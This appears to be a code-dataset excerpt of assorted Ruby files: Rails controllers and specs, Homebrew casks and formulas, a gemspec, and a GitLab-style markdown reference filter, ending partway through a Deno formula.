hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e9da935ef3d5eb3d5d0c79ad3e789f670bbe1827 | 1,027 | class RewardsController < ApplicationController
after_filter :verify_authorized, except: :index
inherit_resources
belongs_to :project, finder: :find_by_permalink!
respond_to :html, :json
def index
render layout: !request.xhr?
end
def new
@reward = Reward.new(project: parent)
authorize @reward
render layout: !request.xhr?
end
def edit
authorize resource
render layout: !request.xhr?
end
def update
authorize resource
update! { project_path(parent) }
end
def create
@reward = Reward.new(permitted_params[:reward].merge(project: parent))
authorize resource
create! { project_path(parent) }
end
def destroy
authorize resource
destroy! { project_path(resource.project) }
end
def sort
authorize resource
resource.update_attribute :row_order_position, params[:reward][:row_order_position]
render nothing: true
end
private
def permitted_params
params.permit(policy(@reward || Reward).permitted_attributes)
end
end
| 20.54 | 87 | 0.717624 |
01bbff7bfad4d5f2094833ace77920e7632509fa | 1,592 | PixieStrd6Com::Application.configure do
# Settings specified here will take precedence over those in config/application.rb
# The test environment is used exclusively to run your application's
# test suite. You never need to work with it otherwise. Remember that
# your test database is "scratch space" for the test suite and is wiped
# and recreated between test runs. Don't rely on the data there!
config.cache_classes = true
# Log error messages when you accidentally call methods on nil.
config.whiny_nils = true
# Show full error reports and disable caching
config.consider_all_requests_local = true
config.action_controller.perform_caching = false
# Raise exceptions instead of rendering exception templates
config.action_dispatch.show_exceptions = false
# Disable request forgery protection in test environment
config.action_controller.allow_forgery_protection = false
# Tell Action Mailer not to deliver emails to the real world.
# The :test delivery method accumulates sent emails in the
# ActionMailer::Base.deliveries array.
config.action_mailer.delivery_method = :test
config.action_mailer.default_url_options = { :host => "localhost:3000" }
# Use SQL instead of Active Record's schema dumper when creating the test database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Print deprecation notices to the stderr
config.active_support.deprecation = :stderr
end
| 43.027027 | 85 | 0.775754 |
5d9d5351687dc121e5605d1fc5b5d3e87b567159 | 3,607 | require 'spec_helper'
describe Projects::Registry::RepositoriesController do
let(:user) { create(:user) }
let(:project) { create(:project, :private) }
before do
sign_in(user)
stub_container_registry_config(enabled: true)
end
context 'when user has access to registry' do
before do
project.add_developer(user)
end
describe 'GET index' do
context 'when root container repository exists' do
before do
create(:container_repository, :root, project: project)
end
it 'does not create root container repository' do
expect { go_to_index }.not_to change { ContainerRepository.all.count }
end
end
context 'when root container repository is not created' do
context 'when there are tags for this repository' do
before do
stub_container_registry_tags(repository: project.full_path,
tags: %w[rc1 latest])
end
it 'successfully renders container repositories' do
go_to_index
expect(response).to have_http_status(:ok)
end
it 'creates a root container repository' do
expect { go_to_index }.to change { ContainerRepository.all.count }.by(1)
expect(ContainerRepository.first).to be_root_repository
end
it 'json has a list of projects' do
go_to_index(format: :json)
expect(response).to have_http_status(:ok)
expect(response).to match_response_schema('registry/repositories')
end
end
context 'when there are no tags for this repository' do
before do
stub_container_registry_tags(repository: :any, tags: [])
end
it 'successfully renders container repositories' do
go_to_index
expect(response).to have_http_status(:ok)
end
it 'does not ensure root container repository' do
expect { go_to_index }.not_to change { ContainerRepository.all.count }
end
it 'responds with json if asked' do
go_to_index(format: :json)
expect(response).to have_http_status(:ok)
expect(json_response).to be_kind_of(Array)
end
end
end
end
describe 'DELETE destroy' do
context 'when root container repository exists' do
let!(:repository) do
create(:container_repository, :root, project: project)
end
before do
stub_container_registry_tags(repository: :any, tags: [])
end
it 'deletes a repository' do
expect { delete_repository(repository) }.to change { ContainerRepository.all.count }.by(-1)
expect(response).to have_http_status(:no_content)
end
end
end
end
context 'when user does not have access to registry' do
describe 'GET index' do
it 'responds with 404' do
go_to_index
expect(response).to have_http_status(:not_found)
end
it 'does not ensure root container repository' do
expect { go_to_index }.not_to change { ContainerRepository.all.count }
end
end
end
def go_to_index(format: :html)
get :index, namespace_id: project.namespace,
project_id: project,
format: format
end
def delete_repository(repository)
delete :destroy, namespace_id: project.namespace,
project_id: project,
id: repository,
format: :json
end
end
| 28.856 | 101 | 0.613252 |
ab1f5d6dabd652646c6ce562dc6f909694065755 | 1,010 | class Admin::PostsController < Admin::BaseController
def index
@posts = Post.order((params[:order].present? ? params[:order] : "created_at") + " DESC").page(params[:page])
end
def show
@post = Post.find(params[:id])
@views = Statistic.where(model_id: @post.id).where(content_type: :visit).order(created_at: :asc)
@copies = Statistic.where(model_id: @post.id).where(content_type: :copy).order(created_at: :asc)
end
def find
@post = Post.find_by_title!(params[:title])
redirect_to admin_post_path(@post.id)
end
def destroy
@post = Post.find(params[:id])
@user = @post.user
if @post.destroy
@notification = Notification.create(user_id: @user.id, content: params[:notification_content]) if params[:notification_content].present?
create_activity(:admin_destroy_post, { post_id: @post.id, code: @post.code, post_user_id: @post.user_id, notification_content: params[:notification_content] || "" })
redirect_to admin_posts_path
end
end
end
| 36.071429 | 171 | 0.69802 |
abeaa0ef6ff03ad060374e751a26fee4de21fe00 | 166 | a, b = gets.split(' ').map(&:to_i)
def possible?(v)
v / 3 > 0 && v % 3 == 0
end
puts possible?(a) || possible?(b) || possible?(a + b) ? "Possible" : "Impossible"
| 20.75 | 81 | 0.536145 |
79dc14b0180135d74cb9cdafee98fee5c6424d06 | 346 | cask 'qlab' do
version '4.4.5'
sha256 'eab8f96f0e95c46f61555fa76e332cf35952c5f4959aad86552a28c671985410'
url "https://figure53.com/qlab/downloads/QLab-#{version}.zip"
appcast "https://figure53.com/qlab/downloads/appcast-v#{version.major}/"
name 'QLab'
homepage 'https://figure53.com/qlab/'
auto_updates true
app 'QLab.app'
end
| 24.714286 | 75 | 0.742775 |
269e09837c5ba3c38cdbc4b576086dbf592d9dad | 775 | require "spec_helper"
describe Mongoid::Extensions::FalseClass do
describe "#__sortable__" do
it "returns 0" do
expect(false.__sortable__).to eq(0)
end
end
describe "#is_a?" do
context "when provided a Boolean" do
it "returns true" do
expect(false.is_a?(Boolean)).to be true
end
end
context "when provided a FalseClass" do
it "returns true" do
expect(false.is_a?(FalseClass)).to be true
end
end
context "when provided a TrueClass" do
it "returns false" do
expect(false.is_a?(TrueClass)).to be false
end
end
context "when provided an invalid class" do
it "returns false" do
expect(false.is_a?(String)).to be false
end
end
end
end
| 18.023256 | 50 | 0.621935 |
1d644c1eb9a473d7ec4e9e59c6868d13d2be2251 | 3,071 | class ListsController < ApplicationController
before_action :set_list, except: [:new, :create, :index]
def new
@list = List.new
if params[:user_id]
user = User.find_by(id: params[:user_id])
if user
verify_user(user)
else
flash[:notice] = "That is not a valid page."
redirect_to user_lists_path(current_user)
end
end
end
def create
@list = List.new(list_params)
if @list
if @list.user
verify_user(@list.user) and return
end
if @list.save
redirect_to list_path(@list)
else
flash[:notice] = @list.errors.messages.values.flatten.join("\n")
render :new
end
else
flash[:notice] = "Those are not valid list details. Please try again."
redirect_to new_user_list_path(current_user)
end
end
def show
if @list
verify_user(@list.user)
else
flash[:notice] = "That is not a valid page."
redirect_to user_lists_path(current_user)
end
end
def index
if params[:user_id]
@user = User.find_by(id: params[:user_id])
if @user
verify_user(@user)
@lists = @user.lists
else
flash[:notice] = "That is not a valid page."
redirect_to user_lists_path(current_user)
end
else
flash[:notice] = "That is not a valid page."
end
end
def edit
if @list
verify_user(@list.user)
else
flash[:notice] = "That is not a valid list."
redirect_to user_lists_path(current_user)
end
end
def update
if @list
if User.find_by(id: params[:list][:user_id].to_i)
verify_user(User.find_by(id: params[:list][:user_id].to_i)) and return
end
if @list.update(list_params)
redirect_to list_path(@list)
else
flash[:notice] = @list.errors.messages.values.flatten.join("\n")
render :edit
end
else
flash[:notice] = "Those are not valid list details."
if @list
render :edit
else
redirect_to user_lists_path(current_user)
end
end
end
def destroy
if @list
verify_user(@list.user)
@list.items.each {|item| item.destroy}
@list.destroy
redirect_to user_lists_path(current_user)
else
flash[:notice] = "That is not a valid page."
end
end
private
def list_params
params.require(:list).permit(:name, :user_id, :active)
end
def set_list
@list = List.find_by(id: params[:id])
end
end | 27.918182 | 86 | 0.499186 |
e2c73c9703de2b6136e44f46433c452ec201df35 | 2,878 | # frozen_string_literal: true
require_relative '../lib/product'
require_relative '../lib/lease_feed'
RSpec.describe LeaseFeed do
ENV['GREENSUB_TEST'] = '1'
before do
# Don't print status messages during specs
allow($stdout).to receive(:puts)
end
context "HEB's live individual subscriber feed" do
product = Product.new('heb')
feed = HEBLeaseFeed.new(product)
it "is donwloadable" do
feed.fetch
expect(feed.datastream).not_to be(nil)
end
it "is XML" do
expect(feed.datastream.xml?).to be(true)
end
it "has at least 50 records" do
expect(feed.datastream.xpath('/ACLSExport/acls').count).to be >= 50
end
describe "A new subscriber" do
sub1_id = '[email protected]'
xml = "<?xml version=\"1.0\"?><ACLSExport><acls><id>1</id><firstname>Example</firstname><lastname>Subscriber</lastname><email>#{sub1_id}</email><phone>555-123-4567</phone><expirationdate>2525-01-01</expirationdate></acls></ACLSExport>"
fakefeed = HEBLeaseFeed.new(product)
fakefeed.datastream = Nokogiri::XML(xml)
sub1 = Individual.new(sub1_id)
xit "is authorized to the product" do
fakefeed.parse
expect(product.host.knows_subscriber?(sub1)).to be(true)
expect(product.subscriber_can_access?(sub1)).to be(true)
end
xit "is unauthorized when the expiration date is today" do
xml2 = "<?xml version=\"1.0\"?><ACLSExport><acls><id>1</id><firstname>Example</firstname><lastname>Subscriber</lastname><email>#{sub1_id}</email><phone>555-123-4567</phone><expirationdate>#{Time.now.strftime('%F')}</expirationdate></acls></ACLSExport>"
fakefeed.datastream = Nokogiri::XML(xml2)
fakefeed.parse
expect(product.subscriber_can_access?(sub1)).to be(false)
end
it "skips if expirartion date is blank" do
sub3_id = "[email protected]"
sub3 = Individual.new(sub3_id)
xml3 = "<?xml version=\"1.0\"?><ACLSExport><acls><id>1</id><firstname>Example</firstname><lastname>Subscriber</lastname><email>#{sub3_id}</email><phone>555-123-4567</phone><expirationdate></expirationdate></acls></ACLSExport>"
fakefeed.datastream = Nokogiri::XML(xml3)
fakefeed.parse
expect(product.subscriber_can_access?(sub3)).to be(false)
end
it "skips if expirartion date is 0000-00-00" do
sub4_id = "[email protected]"
sub4 = Individual.new(sub4_id)
xml4 = "<?xml version=\"1.0\"?><ACLSExport><acls><id>1</id><firstname>Example</firstname><lastname>Subscriber</lastname><email>#{sub4_id}</email><phone>555-123-4567</phone><expirationdate>0000-00-00</expirationdate></acls></ACLSExport>"
fakefeed.datastream = Nokogiri::XML(xml4)
fakefeed.parse
expect(product.subscriber_can_access?(sub4)).to be(false)
end
end
end
end
| 44.96875 | 260 | 0.676164 |
036f5fae98a888a11acd316187a112e76a79708d | 946 | require 'spec_helper'
RSpec.describe GeoCombine::Iso19139 do
include XmlDocs
let(:iso_object){ GeoCombine::Iso19139.new(stanford_iso) }
describe '#initialize' do
it 'returns an instantiated Iso19139 object' do
expect(iso_object).to be_an GeoCombine::Iso19139
end
end
describe '#xsl_geoblacklight' do
it 'should be defined' do
expect(iso_object.xsl_geoblacklight).to be_an Nokogiri::XSLT::Stylesheet
end
end
describe '#xsl_html' do
it 'should be defined' do
expect(iso_object.xsl_geoblacklight).to be_an Nokogiri::XSLT::Stylesheet
end
end
describe '#to_geoblacklight' do
it 'should create a GeoCombine::Geoblacklight object' do
expect(iso_object.to_geoblacklight).to be_an GeoCombine::Geoblacklight
end
end
describe '#to_html' do
it 'should create a transformation of the metadata as a String' do
expect(iso_object.to_html).to be_an String
end
end
end
| 29.5625 | 78 | 0.730444 |
f796e859a46e5ed80ccb793fec5ed47b0a488cd1 | 1,864 | require 'test_helper'
class UsersEditTest < ActionDispatch::IntegrationTest
def setup
@user = users(:michael)
end
test "unsuccessful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
patch user_path(@user), params: { user: { name: "",
email: "foo@invalid",
password: "foo",
password_confirmation: "bar" } }
assert_template 'users/edit'
assert_select "div.alert", "The form contains 4 errors."
end
# test "successful edit" do
# log_in_as(@user)
# get edit_user_path(@user)
# assert_template 'users/edit'
# name = "Foo Bar"
# email = "[email protected]"
# patch user_path(@user), params: { user: { name: name,
# email: email,
# password: "",
# password_confirmation: "" } }
# assert_not flash.empty?
# assert_redirected_to @user
# @user.reload
# assert_equal name, @user.name
# assert_equal email, @user.email
# end
test "successful edit with friendly forwarding" do
get edit_user_path(@user)
log_in_as(@user)
assert_redirected_to edit_user_url(@user)
name = "Foo Bar"
email = "[email protected]"
patch user_path(@user), params: { user: { name: name,
email: email,
password: "",
password_confirmation: "" } }
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal name, @user.name
assert_equal email, @user.email
end
end
| 33.285714 | 78 | 0.498927 |
03055fdd039c8f6fd770c22e5bac8071783bc5ed | 134 | class StaticPagesController < ApplicationController
def home
end
def support
end
def about
end
def contact
end
end
| 9.571429 | 51 | 0.723881 |
1dfee3ab16dcb126f9a5e38bf03fa3027519af58 | 1,021 | class Presenters::FacetValues::DefaultPresenter
attr_reader :count
def initialize(view, active_facets, facet_value)
@value = facet_value.value
@count = facet_value.count
@solr_index = facet_value.solr_index
@active_facets = active_facets || {}
@view = view
end
def facet_search_link
if @active_facets[@solr_index].present? && @active_facets[@solr_index].include?(@value)
@view.link_to @view.query_params_without_facet_value(@solr_index, @value), rel: 'nofollow' do
@view.concat(@view.content_tag(:input, '', type: 'checkbox', 'aria-label' => @value, checked: true,
class: 'mr-2'))
@view.concat(display)
end
else
@view.link_to @view.query_params_with_facet(@solr_index, @value), rel: 'nofollow' do
@view.concat(@view.content_tag(:input, '', type: 'checkbox', 'aria-label' => @value, class: 'mr-2'))
@view.concat(display)
end
end
end
def display
@value
end
end
| 30.939394 | 108 | 0.633692 |
08d08f17726329e4c2666625afd8e44bf0b1bbc8 | 953 | $:.push File.expand_path("../lib", __FILE__)
# Maintain your gem's version:
require "core/version"
# Describe your gem and declare its dependencies:
Gem::Specification.new do |s|
s.name = "core"
s.version = Core::VERSION
s.authors = ["Elton Silva"]
s.email = ["[email protected]"]
s.homepage = "https://github.com/codhab/core.git"
s.summary = "Summary of Core."
s.description = "Description of Core."
s.license = "MIT"
s.files = Dir["{app,config,db,lib}/***/**/*", "MIT-LICENSE", "Rakefile", "README.md"]
s.test_files = Dir["spec/***/**/*"]
s.add_dependency "rails", "~> 5.0.2"
s.add_dependency "pg"
s.add_dependency "one_signal"
s.add_dependency "validates_cpf_cnpj"
s.add_dependency "validates_timeliness"
s.add_dependency "email_validator"
s.add_dependency "file_validators"
s.add_dependency "carrierwave"
s.add_dependency "friendly_id"
s.add_dependency "haml-rails"
end | 31.766667 | 87 | 0.670514 |
61f82626c93d248bf7e3a3f7c1685d744c2516c0 | 2,217 | # -*- encoding: utf-8 -*-
# stub: sshkit 1.7.1 ruby lib
Gem::Specification.new do |s|
s.name = "sshkit"
s.version = "1.7.1"
s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib"]
s.authors = ["Lee Hambley", "Tom Clements"]
s.date = "2015-03-02"
s.description = "A comprehensive toolkit for remotely running commands in a structured manner on groups of servers."
s.email = ["[email protected]", "[email protected]"]
s.homepage = "http://github.com/capistrano/sshkit"
s.licenses = ["GPL3"]
s.rubygems_version = "2.4.5"
s.summary = "SSHKit makes it easy to write structured, testable SSH commands in Ruby"
s.installed_by_version = "2.4.5" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then
s.add_runtime_dependency(%q<net-ssh>, [">= 2.8.0"])
s.add_runtime_dependency(%q<net-scp>, [">= 1.1.2"])
s.add_runtime_dependency(%q<colorize>, [">= 0.7.0"])
s.add_development_dependency(%q<minitest>, ["< 2.12.0", ">= 2.11.3"])
s.add_development_dependency(%q<rake>, [">= 0"])
s.add_development_dependency(%q<turn>, [">= 0"])
s.add_development_dependency(%q<unindent>, [">= 0"])
s.add_development_dependency(%q<mocha>, [">= 0"])
else
s.add_dependency(%q<net-ssh>, [">= 2.8.0"])
s.add_dependency(%q<net-scp>, [">= 1.1.2"])
s.add_dependency(%q<colorize>, [">= 0.7.0"])
s.add_dependency(%q<minitest>, ["< 2.12.0", ">= 2.11.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<turn>, [">= 0"])
s.add_dependency(%q<unindent>, [">= 0"])
s.add_dependency(%q<mocha>, [">= 0"])
end
else
s.add_dependency(%q<net-ssh>, [">= 2.8.0"])
s.add_dependency(%q<net-scp>, [">= 1.1.2"])
s.add_dependency(%q<colorize>, [">= 0.7.0"])
s.add_dependency(%q<minitest>, ["< 2.12.0", ">= 2.11.3"])
s.add_dependency(%q<rake>, [">= 0"])
s.add_dependency(%q<turn>, [">= 0"])
s.add_dependency(%q<unindent>, [">= 0"])
s.add_dependency(%q<mocha>, [">= 0"])
end
end
| 41.055556 | 118 | 0.608931 |
ed140cb6a7f53caa668c15a862436f99def04781 | 349 | require_relative "./dog_breeds_info/version"
require_relative "./dog_breeds_info/cli"
require_relative "./dog_breeds_info/breed_list"
require_relative "./dog_breeds_info/breed"
require_relative "./dog_breeds_info/scraper"
require 'nokogiri'
require 'open-uri'
module DogBreedsInfo
class Error < StandardError; end
# Your code goes here...
end
| 24.928571 | 47 | 0.802292 |
bf01eacb527042228c2586dc940d75af2f77ce9c | 480 | # frozen_string_literal: true
redis_url = "redis://#{ENV['REDIS_HOST']}:#{ENV['REDIS_PORT']}/#{ENV['REDIS_DB']}"
Sidekiq.configure_server do |config|
config.redis = { url: redis_url, namespace: 'sidekiq_data' }
end
Sidekiq.configure_client do |config|
config.redis = { url: redis_url, namespace: 'sidekiq_data' }
end
Sidekiq::Statistic.configure do |config|
config.log_file = 'log/sidekiq.log'
config.last_log_lines = 10_000
config.max_timelist_length = 500_000
end
| 26.666667 | 82 | 0.735417 |
01f2e13362fddbf43fed6cb49763e4aca34f996a | 572 | require 'pg'
class Peep
def self.all
if ENV['ENVIRONMENT'] == 'test'
connection = PG.connect(dbname: 'chitter1_test')
else
connection = PG.connect(dbname: 'chitter1')
end
result = connection.exec('SELECT * FROM peeps')
result.map { |peep| peep['message'] }
end
def self.create(options)
if ENV['ENVIRONMENT'] == 'test'
connection = PG.connect(dbname: 'chitter1_test')
else
connection = PG.connect(dbname: 'chitter1')
end
connection.exec("INSERT INTO peeps (message) VALUES('#{options[:mes]}')")
end
end
| 24.869565 | 77 | 0.636364 |
ab6c5bfb2f5781535e9ccae0683a5196f1a90e4b | 442 | class Cache < ActiveRecord::Base
validates :cache_valid, inclusion: { in: [true, false] }
validates :cache_valid, exclusion: { in: [nil] }
validates :key, presence: true, length: { maximum: 255 }
validates :value, presence: true, length: { maximum: 4096 }
def invalidate
update_attribute :cache_valid, false
end
def update(value)
if value
update_attribute :value, value
update_attribute :cache_valid, true
end
end
end
| 24.555556 | 61 | 0.719457 |
7af261643181e12c23330ed232d48095c87216df | 853 | require_relative "../canvas_base_resolver"
module LMSGraphQL
module Resolvers
module Canvas
class GetRubricCommentsReadStateCourse < CanvasBaseResolver
type Boolean, null: false
argument :course_id, ID, required: true
argument :assignment_id, ID, required: true
argument :user_id, ID, required: true
def resolve(course_id:, assignment_id:, user_id:, get_all: false)
result = context[:canvas_api].call("GET_RUBRIC_COMMENTS_READ_STATE_COURSES").proxy(
"GET_RUBRIC_COMMENTS_READ_STATE_COURSES",
{
"course_id": course_id,
"assignment_id": assignment_id,
"user_id": user_id },
nil,
get_all,
)
get_all ? result : result.parsed_response
end
end
end
end
end | 32.807692 | 93 | 0.615475 |
e82610d79b5865eed6a7acd9d869dbcc9d7c0a92 | 786 | require "test_helper"
describe TopicsController do
include RummagerHelpers
describe "GET topic" do
describe "with a valid topic slug" do
before do
content_store_has_item("/topic/oil-and-gas", topic_example)
end
it "sets expiry headers for 30 minutes" do
get :show, params: { topic_slug: "oil-and-gas" }
assert_equal "max-age=1800, public", response.headers["Cache-Control"]
end
end
it "returns a 404 status for GET topic with an invalid sector tag" do
content_store_does_not_have_item("/topic/oil-and-gas")
get :show, params: { topic_slug: "oil-and-gas" }
assert_equal 404, response.status
end
end
def topic_example
GovukSchemas::Example.find("topic", example_name: "topic")
end
end
| 25.354839 | 78 | 0.678117 |
ed7af129cea5d585b6d666b57e0642d75c81b859 | 279 | class Label
attr_accessor :title, :color, :items
def initialize(title, color)
@id = Random.rand(1..1000)
@title = title
@color = color
@items = []
end
def add_item(item)
@items.push(item) unless @items.include?(item)
item.label = self
end
end
| 17.4375 | 50 | 0.62724 |
ff133daac0e8bf794130405d8b22b0f33a11245c | 2,057 | # frozen_string_literal: true
require 'rails_helper'
describe MVI::Models::MviProfile do
describe '#mhv_correlation_id' do
context 'with multiple ids' do
subject { build(:mvi_profile) }
it 'returns the first id' do
expect(subject.mhv_correlation_id).to eq(subject.mhv_ids.first)
end
end
context 'with a single id' do
subject { build(:mvi_profile, mhv_ids: [id]) }
let(:id) { '12345678' }
it 'returns the id' do
expect(subject.mhv_correlation_id).to eq(id)
end
end
context 'with no ids' do
subject { build(:mvi_profile, mhv_ids: nil) }
it 'returns nil' do
expect(subject.mhv_correlation_id).to be_nil
end
end
context 'with an invalid birth date' do
subject { build(:mvi_profile, birth_date: '0') }
it 'returns a nil birth_date' do
expect(subject.birth_date).to be_nil
end
end
context 'with a valid birth date' do
subject { build(:mvi_profile, birth_date: '1985-01-01') }
it 'returns a non-nil birth_date' do
expect(Date.parse(subject.birth_date)).to be_a(Date)
expect(subject.birth_date).not_to be_nil
end
end
end
describe '#normalized_suffix' do
context 'with a non-nil suffix' do
cases = {
'Jr.' => %w[jr jr. JR JR. Jr Jr. jR jR.],
'Sr.' => %w[sr sr. SR SR. Sr Sr. sR sR.],
'II' => %w[i I].repeated_permutation(2).map(&:join),
'III' => %w[i I].repeated_permutation(3).map(&:join),
'IV' => %w[iv IV Iv iV],
nil => %w[i mr ms mrs md v]
}
cases.each do |expected_result, inputs|
inputs.each do |input|
it 'returns a properly formatted suffix' do
expect(build(:mvi_profile, suffix: input).normalized_suffix).to eq(expected_result)
end
end
end
end
end
describe 'attributes' do
subject { build(:mvi_profile) }
it 'returns a icn_with_aaid' do
expect(subject.icn_with_aaid.present?).to eq true
end
end
end
| 25.7125 | 95 | 0.607681 |
ed3682da3ac59795ecf0ed1d4c2a9b8c96629968 | 297 | require 'spec_helper'
describe Cronofy::ResponseParser do
it 'should return hash from a given response' do
response = OpenStruct.new(body: '{"a": 1, "b": 2}')
response_parser = Cronofy::ResponseParser.new(response)
expect(response_parser.json).to eq({'a' => 1, 'b' => 2})
end
end
| 29.7 | 60 | 0.680135 |
ab987161a8daf498236ccc6fa43a8f69ea7bdecd | 313 | class CreateStudentAdditionalDetails < ActiveRecord::Migration
def self.up
create_table :student_additional_details do |t|
t.references :student
t.references :additional_field
t.string :additional_info
end
end
def self.down
drop_table :student_additional_details
end
end | 24.076923 | 62 | 0.741214 |
38bbed3cf72da06dc7b2ce8fdb85076119d007b1 | 4,333 | # frozen_string_literal: true
# Generated HTML is transformed back to GFM by app/assets/javascripts/behaviors/markdown/nodes/reference.js
module Banzai
module Filter
# Base class for GitLab Flavored Markdown reference filters.
#
# References within <pre>, <code>, <a>, and <style> elements are ignored.
#
# Context options:
# :project (required) - Current project, ignored if reference is cross-project.
# :only_path - Generate path-only links.
class ReferenceFilter < HTML::Pipeline::Filter
include RequestStoreReferenceCache
include OutputSafety
class << self
attr_accessor :reference_type
end
# Returns a data attribute String to attach to a reference link
#
# attributes - Hash, where the key becomes the data attribute name and the
# value is the data attribute value
#
# Examples:
#
# data_attribute(project: 1, issue: 2)
# # => "data-reference-type=\"SomeReferenceFilter\" data-project=\"1\" data-issue=\"2\""
#
# data_attribute(project: 3, merge_request: 4)
# # => "data-reference-type=\"SomeReferenceFilter\" data-project=\"3\" data-merge-request=\"4\""
#
# Returns a String
def data_attribute(attributes = {})
attributes = attributes.reject { |_, v| v.nil? }
attributes[:reference_type] ||= self.class.reference_type
attributes[:container] ||= 'body'
attributes[:placement] ||= 'top'
attributes[:html] ||= 'true'
attributes.delete(:original) if context[:no_original_data]
attributes.map do |key, value|
%Q(data-#{key.to_s.dasherize}="#{escape_once(value)}")
end.join(' ')
end
def ignore_ancestor_query
@ignore_ancestor_query ||= begin
parents = %w(pre code a style)
parents << 'blockquote' if context[:ignore_blockquotes]
parents.map { |n| "ancestor::#{n}" }.join(' or ')
end
end
def project
context[:project]
end
def group
context[:group]
end
def skip_project_check?
context[:skip_project_check]
end
def reference_class(type, tooltip: true)
gfm_klass = "gfm gfm-#{type}"
return gfm_klass unless tooltip
"#{gfm_klass} has-tooltip"
end
# Ensure that a :project key exists in context
#
# Note that while the key might exist, its value could be nil!
def validate
needs :project unless skip_project_check?
end
# Iterates over all <a> and text() nodes in a document.
#
# Nodes are skipped whenever their ancestor is one of the nodes returned
# by `ignore_ancestor_query`. Link tags are not processed if they have a
# "gfm" class or the "href" attribute is empty.
def each_node
return to_enum(__method__) unless block_given?
query = %Q{descendant-or-self::text()[not(#{ignore_ancestor_query})]
| descendant-or-self::a[
not(contains(concat(" ", @class, " "), " gfm ")) and not(@href = "")
]}
doc.xpath(query).each do |node|
yield node
end
end
# Returns an Array containing all HTML nodes.
def nodes
@nodes ||= each_node.to_a
end
# Yields the link's URL and inner HTML whenever the node is a valid <a> tag.
def yield_valid_link(node)
link = CGI.unescape(node.attr('href').to_s)
inner_html = node.inner_html
return unless link.force_encoding('UTF-8').valid_encoding?
yield link, inner_html
end
def replace_text_when_pattern_matches(node, pattern)
return unless node.text =~ pattern
content = node.to_html
html = yield content
node.replace(html) unless content == html
end
def replace_link_node_with_text(node, link)
html = yield
node.replace(html) unless html == node.text
end
def replace_link_node_with_href(node, link)
html = yield
node.replace(html) unless html == link
end
def text_node?(node)
node.is_a?(Nokogiri::XML::Text)
end
def element_node?(node)
node.is_a?(Nokogiri::XML::Element)
end
end
end
end
| 29.277027 | 107 | 0.609508 |
e2030976e7e8e09299b997b9e7c5799cf83e86dd | 472 | cask "rightfont" do
version "5.9.0"
sha256 "17539732acb77bfa7c156175b82f33f4a02e8ceb15784442752d93e10722d0f1"
url "https://rightfontapp.com/update/rightfont.zip"
appcast "https://rightfontapp.com/update/appcast#{version.major}.xml"
name "RightFont"
desc "Font manager that helps preview, install, sync and manage fonts"
homepage "https://rightfontapp.com/"
auto_updates true
depends_on macos: ">= :yosemite"
app "RightFont #{version.major}.app"
end
| 29.5 | 75 | 0.756356 |
911ca8eb4a0c855dfaff83fdb4b5eebd4e83bc2b | 2,603 | # Copyright (c) 2009-2012 VMware, Inc.
module Bosh::Agent
module ApplyPlan
class Plan
attr_reader :deployment
attr_reader :jobs
attr_reader :packages
def initialize(spec)
unless spec.is_a?(Hash)
raise ArgumentError, "Invalid spec format, Hash expected, " +
"#{spec.class} given"
end
@spec = spec
@deployment = spec["deployment"]
@jobs = []
@packages = []
@config_binding = Bosh::Agent::Util.config_binding(spec)
job_spec = spec["job"]
package_specs = spec["packages"]
# By default stemcell VM has '' as job
# in state.yml, handling this very special case
if job_spec && job_spec != ""
job_name = job_spec["name"]
if is_legacy_spec?(job_spec)
@jobs << Job.new(job_name, job_spec["template"], job_spec,
@config_binding)
else
job_spec["templates"].each do |template_spec|
@jobs << Job.new(job_name, template_spec["name"], template_spec,
@config_binding)
end
end
end
if package_specs
unless package_specs.is_a?(Hash)
raise ArgumentError, "Invalid package specs format " +
"in apply spec, Hash expected " +
"#{package_specs.class} given"
end
package_specs.each_pair do |package_name, package_spec|
@packages << Package.new(package_spec)
end
end
end
def is_legacy_spec?(job_spec)
return job_spec["template"] && !job_spec["templates"]
end
def has_jobs?
[email protected]?
end
def has_packages?
[email protected]?
end
# TODO: figure out why it has to be an apply marker
def configured?
@spec.key?("configuration_hash")
end
def install_jobs
@jobs.each do |job|
job.install
end
end
def install_packages
@jobs.each do |job|
@packages.each do |package|
package.install_for_job(job)
end
end
end
# Configure the 1+ job templates (job colocation)
# They are reversed for the purposes of ensuring monit
# starts them in the order that they are specified
# in the original deployment manifest
def configure_jobs
@jobs.reverse.each_with_index do |job, job_index|
job.configure(job_index)
end
end
end
end
end
| 26.561224 | 78 | 0.553208 |
f73d97bd2c86c57dc28d6bd192c6e6bf21cf7783 | 2,400 | class Deno < Formula
desc "Secure runtime for JavaScript and TypeScript"
homepage "https://deno.land/"
url "https://github.com/denoland/deno/releases/download/v1.0.0/deno_src.tar.gz"
sha256 "89709f489e4cbbcfd6913d14e903fcb47c92f329d077477190b0dbd8bd23acc7"
bottle do
cellar :any_skip_relocation
rebuild 1
sha256 "81f9460d523a17ef07486469e5f85709aa36cc16614bc5df24fe2e36ab150233" => :catalina
sha256 "faa0baff031d4ed196065aa8b908603b55f1f4ec91cf1b3c0236840d74661c79" => :mojave
sha256 "9675b67b91c25a48453a3256276a59df015b0232a4137802560cc439b556b4c0" => :high_sierra
end
depends_on "llvm" => :build
depends_on "ninja" => :build
depends_on "rust" => :build
depends_on :xcode => ["10.0", :build] # required by v8 7.9+
depends_on :macos # Due to Python 2 (see https://github.com/denoland/deno/issues/2893)
uses_from_macos "xz"
resource "gn" do
url "https://gn.googlesource.com/gn.git",
:revision => "5ed3c9cc67b090d5e311e4bd2aba072173e82db9"
end
def install
# Build gn from source (used as a build tool here)
(buildpath/"gn").install resource("gn")
cd "gn" do
system "python", "build/gen.py"
system "ninja", "-C", "out/", "gn"
end
# env args for building a release build with our clang, ninja and gn
ENV["GN"] = buildpath/"gn/out/gn"
# build rusty_v8 from source
ENV["V8_FROM_SOURCE"] = "1"
